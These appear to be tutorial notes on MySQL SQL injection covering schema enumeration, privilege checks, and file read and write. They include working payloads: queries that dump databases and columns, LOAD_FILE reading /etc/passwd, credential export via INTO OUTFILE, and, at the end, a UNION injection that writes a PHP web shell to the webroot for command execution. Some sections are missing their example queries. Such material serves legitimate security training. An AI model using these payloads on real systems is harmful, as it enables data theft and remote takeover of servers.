SQL Injection Fundamentals

Database Enumeration

MySQL Fingerprinting

As we cover MySQL in this module, let us fingerprint MySQL databases. The following queries and their output will tell us that we are dealing with MySQL:

INFORMATION_SCHEMA Database

To pull data from tables using UNION SELECT, we need to properly form our SELECT queries. To do so, we need the following information:

• List of databases

• List of tables within each database

• List of columns within each table

With the above information, we can form our SELECT statement to dump data from any column in any table within any database inside the DBMS. This is where we can utilize the INFORMATION_SCHEMA Database.

So, to reference a table present in another DB, we can use the dot ‘.’ operator. For example, to SELECT a table users present in a database named my_database, we can use:

SELECT * FROM my_database.users;

SCHEMATA

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

We can find the current database with the SELECT database() query

TABLES

To find all tables within a database, we can use the TABLES table in the INFORMATION_SCHEMA Database.

COLUMNS

Practical Examples

Get DB name

select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.schemata

Get Tables From DB name

select group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema='DBNAME'

Get Columns From DB Name (at least used with tables with 1 column)

select group_concat(table_name, ':', column_name) from INFORMATION_SCHEMA.columns where table_schema='DBNAME'

Reading Files

Privileges

Reading data is much more common than writing data, which is strictly reserved for privileged users in modern DBMSes, as it can lead to system exploitation, as we will see. For example, in MySQL, the DB user must have the FILE privilege to load a file's content into a table and then dump data from that table and read files. So, let us start by gathering data about our user privileges within the database to decide whether we will read and/or write files to the back-end server.

DB User

While we do not necessarily need database administrator (DBA) privileges to read data, this is becoming more required in modern DBMSes, as only DBA are given such privileges. The same applies to other common databases. If we do have DBA privileges, then it is much more probable that we have file-read privileges. If we do not, then we have to check our privileges to see what we can do. To be able to find our current DB user, we can use any of the following queries:

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

User Privileges

First of all, we can test if we have super admin privileges with the following query:

SELECT super_priv FROM mysql.user

We can also dump other privileges we have directly from the schema, with the following query:

SELECT grantee, privilege_type FROM information_schema.user_privileges -- -

From here, we can add WHERE grantee="'root'@'localhost'" to only show our current user root privileges.

We see that the FILE privilege is listed for our user, enabling us to read files and potentially even write files. Thus, we can proceed with attempting to read files.

LOAD_FILE

SELECT LOAD_FILE('/etc/passwd');

Writing Files

Write File Privileges

To be able to write files to the back-end server using a MySQL database, we require three things:

1. User with FILE privilege enabled

2. MySQL global secure_file_priv variable not enabled

3. Write access to the location we want to write to on the back-end server

secure_file_priv

Otherwise, if a certain directory is set, we can only read from the folder specified by the variable.

On the other hand, NULL means we cannot read/write from any directory.

MariaDB has this variable set to empty by default, which lets us read/write to any file if the user has the FILE privilege. However, MySQL uses /var/lib/mysql-files as the default folder.

SHOW VARIABLES LIKE 'secure_file_priv';

However, as we are using a UNION injection, we have to get the value using a SELECT statement. This shouldn't be a problem, as all variables and most configurations' are stored within the INFORMATION_SCHEMA database.

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

SELECT INTO OUTFILE

SELECT * from users INTO OUTFILE '/tmp/credentials';

Writing Files through SQL Injection

Let's try writing a text file to the webroot and verify if we have write permissions.

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

Writing a Web Shell

Having confirmed write permissions, we can go ahead and write a PHP web shell to the webroot folder. We can write the following PHP webshell to be able to execute commands directly on the back-end server:

<?php system($_REQUEST[0]); ?>

union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Once again, we don't see any errors, which means the file write probably worked. This can be verified by browsing to the /shell.php file and executing commands via the 0 parameter, with ?0=id in our URL: